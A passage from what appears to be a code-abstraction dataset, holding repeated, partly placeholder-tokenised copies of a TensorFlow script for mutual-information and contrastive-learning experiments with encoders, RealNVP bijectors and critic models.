copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n\n\ndef run_sweep(nets, critics, loss_fns, exp_name, **kwargs):\n \"\"\"Runs the sweep across encoder networks, critics, and the estimators.\"\"\"\n grid = itertools.product(nets, critics, loss_fns)\n data_frames = []\n results_with_singular_values = []\n for nets_name, critic_name, loss_name in grid:\n print('[New experiment] encoder: {}, critic: {}, loss: {}'.format(\n nets_name, critic_name, loss_name))\n with tf.Graph().as_default():\n g1, g2 = nets[nets_name]()\n critic = critics[critic_name]()\n loss_fn = loss_fns[loss_name]\n results_per_run = []\n for n in range(NRUNS):\n try:\n print('{:d}th run, loss: {}'.format(n, loss_name))\n if loss_name == 'drfc' and TFDS_NAME == 'cifar10':\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n else:\n results = train(g1, g2, critic, loss_fn, **kwargs,\n learning_rate=LEARNING_RATE, n_iter=n,\n loss_name=loss_name)\n results_per_run.append(results)\n except Exception as ex:\n print('Run {} failed! Error: {}'.format(n, ex))\n for i, result in enumerate(results_per_run):\n data_frames.append(convert_to_data_frame(result, exp_name,\n nets_name, critic_name, loss_name, i))\n if kwargs.get('compute_jacobian', False):\n results_with_singular_values.append((ResultsConfig(\n nets_name, critic_name, loss_name), results_per_run))\n return {'df': pd.concat(data_frames), 'singular_values':\n results_with_singular_values}\n\n\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n\n\ndef map_fn(example):\n image = example[FEATURE_INPUT]\n image = tf.cast(image, tf.float32) / 255.0\n image = tf.reshape(image, [-1])\n label = example[FEATURE_LABEL]\n return {FEATURE_INPUT: image, FEATURE_LABEL: label}\n\n\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass LayerNorm(tfkl.Layer):\n \"\"\" Layer Normalization in the style of https://arxiv.org/abs/1607.06450 \"\"\"\n\n def __init__(self, scale_initializer='ones', bias_initializer='zeros',\n axes=[1, 2, 3], epsilon=1e-06, **kwargs):\n super(LayerNorm, self).__init__(**kwargs)\n self.epsilon = epsilon\n self.scale_initializer = tf.keras.initializers.get(scale_initializer)\n self.bias_initializer = tf.keras.initializers.get(bias_initializer)\n self.axes = axes\n\n def build(self, input_shape):\n self.scale = self.add_weight(shape=(input_shape[-1],), initializer=\n self.scale_initializer, trainable=True, name='{}_scale'.format(\n self.name))\n self.bias = self.add_weight(shape=(input_shape[-1],), initializer=\n self.bias_initializer, trainable=True, name='{}_bias'.format(\n self.name))\n self.built = True\n\n def call(self, x, mask=None):\n mean = tf.keras.backend.mean(x, axis=self.axes, keepdims=True)\n std = tf.keras.backend.std(x, axis=self.axes, keepdims=True)\n norm = (x - mean) * (1 / (std + self.epsilon))\n return norm * self.scale + self.bias\n\n def compute_output_shape(self, input_shape):\n return input_shape\n\n\nclass ConvNet(tf.keras.Sequential):\n\n def __init__(self, channels=64, kernel_size=5, input_dim=DIMS // 2,\n output_dim=100, activation=tf.nn.relu):\n super(ConvNet, self).__init__([tfkl.Reshape((14, 28, 1),\n input_shape=(input_dim,)), tfkl.Conv2D(channels, kernel_size,\n strides=2, padding='same', activation=activation), tfkl.Conv2D(\n 2 * channels, kernel_size, strides=2, padding='same',\n activation=activation), LayerNorm(), tfkl.\n GlobalAveragePooling2D(), tfkl.Dense(output_dim)])\n\n\n<import token>\n\n\nclass RealNVP(bijector_lib.Bijector):\n\n def __init__(self, num_masked, shift_and_log_scale_fn=None, bijector_fn\n =None, is_constant_jacobian=False, validate_args=False, name=None):\n name = name or 'real_nvp'\n if num_masked < 0:\n raise ValueError('num_masked must be a non-negative integer.')\n self._num_masked = num_masked\n self._input_depth = None\n if bool(shift_and_log_scale_fn) == bool(bijector_fn):\n raise ValueError(\n 'Exactly one of `shift_and_log_scale_fn` and `bijector_fn` should be specified.'\n )\n if shift_and_log_scale_fn:\n\n def _bijector_fn(x0, input_depth, **condition_kwargs):\n shift, log_scale = shift_and_log_scale_fn(x0, input_depth,\n **condition_kwargs)\n return affine_scalar.AffineScalar(shift=shift, scale=log_scale)\n bijector_fn = _bijector_fn\n if validate_args:\n bijector_fn = _validate_bijector_fn(bijector_fn)\n self._shift_and_log_scale_fn = shift_and_log_scale_fn\n self._bijector_fn = bijector_fn\n super(RealNVP, self).__init__(forward_min_event_ndims=1,\n is_constant_jacobian=is_constant_jacobian, validate_args=\n validate_args, name=name)\n\n def _cache_input_depth(self, x):\n if self._input_depth is None:\n self._input_depth = tf.compat.dimension_value(tensorshape_util.\n with_rank_at_least(x.shape, 1)[-1])\n if self._input_depth is None:\n raise NotImplementedError(\n 'Rightmost dimension must be known prior to graph execution.'\n )\n if self._num_masked >= self._input_depth:\n raise ValueError(\n 'Number of masked units must be smaller than the event size.'\n )\n\n def _forward(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n y1 = self._bijector_fn(x0, self._input_depth - self._num_masked, **\n condition_kwargs).forward(x1)\n y = tf.concat([x0, y1], axis=-1)\n return y\n\n def _inverse(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n x1 = self._bijector_fn(y0, self._input_depth - self._num_masked, **\n condition_kwargs).inverse(y1)\n x = tf.concat([y0, x1], axis=-1)\n return x\n\n def _forward_log_det_jacobian(self, x, **condition_kwargs):\n self._cache_input_depth(x)\n x0, x1 = x[..., :self._num_masked], x[..., self._num_masked:]\n return self._bijector_fn(x0, self._input_depth - self._num_masked,\n **condition_kwargs).forward_log_det_jacobian(x1, event_ndims=1)\n\n def _inverse_log_det_jacobian(self, y, **condition_kwargs):\n self._cache_input_depth(y)\n y0, y1 = y[..., :self._num_masked], y[..., self._num_masked:]\n return self._bijector_fn(y0, self._input_depth - self._num_masked,\n **condition_kwargs).inverse_log_det_jacobian(y1, event_ndims=1)\n\n\n<function token>\n\n\nclass RealNVPBijector(tf.keras.Model):\n\n def __init__(self, dimensions, n_couplings, hidden_layers, dense_kwargs):\n super(RealNVPBijector, self).__init__()\n permutations = [np.random.permutation(dimensions) for _ in range(\n n_couplings)]\n bijectors = []\n for permutation in permutations:\n bijectors.append(RealNVP(dimensions // 2,\n real_nvp_default_template(hidden_layers, **dense_kwargs)))\n bijectors.append(tfb.Permute(permutation))\n self._bijector = tfb.Chain(bijectors)\n\n def call(self, inputs):\n return self._bijector.forward(inputs)\n\n\nclass InnerProdCritic(tf.keras.Model):\n\n def call(self, x, y):\n return tf.matmul(x, y, transpose_b=True)\n\n\nclass BilinearCritic(tf.keras.Model):\n\n def __init__(self, feature_dim=100, **kwargs):\n super(BilinearCritic, self).__init__(**kwargs)\n self._W = tfkl.Dense(feature_dim, use_bias=False)\n\n def call(self, x, y):\n return tf.matmul(x, self._W(y), transpose_b=True)\n\n\nclass ConcatCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=200, layers=1, activation='relu', **kwargs):\n super(ConcatCritic, self).__init__(**kwargs)\n self._f = MLP([hidden_dim for _ in range(layers)] + [1], False, {\n 'activation': 'relu'})\n\n def call(self, x, y):\n batch_size = tf.shape(input=x)[0]\n x_tiled = tf.tile(x[None, :], (batch_size, 1, 1))\n y_tiled = tf.tile(y[:, None], (1, batch_size, 1))\n xy_pairs = tf.reshape(tf.concat((x_tiled, y_tiled), axis=2), [\n batch_size * batch_size, -1])\n scores = self._f(xy_pairs)\n return tf.transpose(a=tf.reshape(scores, [batch_size, batch_size]))\n\n\nclass SeparableCritic(tf.keras.Model):\n\n def __init__(self, hidden_dim=100, output_dim=100, layers=1, activation\n ='relu', **kwargs):\n super(SeparableCritic, self).__init__(**kwargs)\n self._f_x = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n self._f_y = MLP([hidden_dim for _ in range(layers)] + [output_dim],\n False, {'activation': activation})\n\n def call(self, x, y):\n x_mapped = self._f_x(x)\n y_mapped = self._f_y(y)\n return tf.matmul(x_mapped, y_mapped, transpose_b=True)\n\n\n<function token>\n<function token>\n<function token>\n<code token>\n",
"<import token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<assignment token>\n<function token>\n\n\ndef convert_to_data_frame(result, exp_name, nets, critic, loss, seed):\n \"\"\"Convert results class to a data frame.\"\"\"\n label = '{}, {}, {}'.format(nets, critic, loss)\n rows = list(zip(itertools.repeat(exp_name), itertools.repeat(nets),\n itertools.repeat(critic), itertools.repeat(loss), itertools.repeat(\n seed), result.iterations, [(-loss) for loss in result.\n testing_losses], result.classification_accuracies, itertools.repeat\n (label)))\n df_eval = pd.DataFrame(rows, columns=('exp_name', 'nets', 'Critic',\n 'Estimator', 'run', 'iteration', 'bound_value', 'accuracy', 'label'))\n df_eval['Estimator'] = df_eval['Estimator'].replace(to_replace={'cpc':\n '$CPC$', 'pcc': '$PCC$', 'drfc': '$D-RFC$', 'wpc': '$WPC$'})\n df_eval['Critic'] = df_eval['Critic'].replace(to_replace={'concat':\n 'MLP', 'separable': 'Separable', 'innerprod': 'Inner product',\n 'bilinear': 'Bilinear'})\n return df_eval\n\n\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n<function token>\n\n\ndef logistic_fit(x_train, y_train, x_test, y_test):\n logistic_regressor = sk_linear.LogisticRegression(solver='saga',\n multi_class='multinomial', tol=0.1, C=10.0)\n from sklearn.preprocessing import MinMaxScaler\n scaler = MinMaxScaler()\n x_train = scaler.fit_transform(x_train)\n x_test = scaler.transform(x_test)\n logistic_regressor.fit(x_train, y_train.ravel())\n return logistic_regressor.score(x_test, y_test.ravel())\n\n\n<code token>\n<function token>\n<function token>\n<function token>\n<assignment token>\n<code token>\n<assignment token>\n<code token>\n<function token>\n\n\nclass MLP(tf.keras.Model):\n\n def __init__(self, layer_dimensions, shortcuts, dense_kwargs={}):\n super(MLP, self).__init__()\n self._layers = [tfkl.Dense(dimensions, **dense_kwargs) for\n dimensions in layer_dimensions[:-1]]\n dense_kwargs_copy = copy.deepcopy(dense_kwargs)\n dense_kwargs_copy['activation'] = None\n self._layers.append(tfkl.Dense(layer_dimensions[-1], **\n dense_kwargs_copy))\n self._shortcuts = shortcuts\n\n @property\n def layers(self):\n return self._layers\n\n def __call__(self, inputs):\n x = inputs\n for layer in self.layers:\n x = layer(x) + x if self._shortcuts else layer(x)\n return x\n\n\nclass 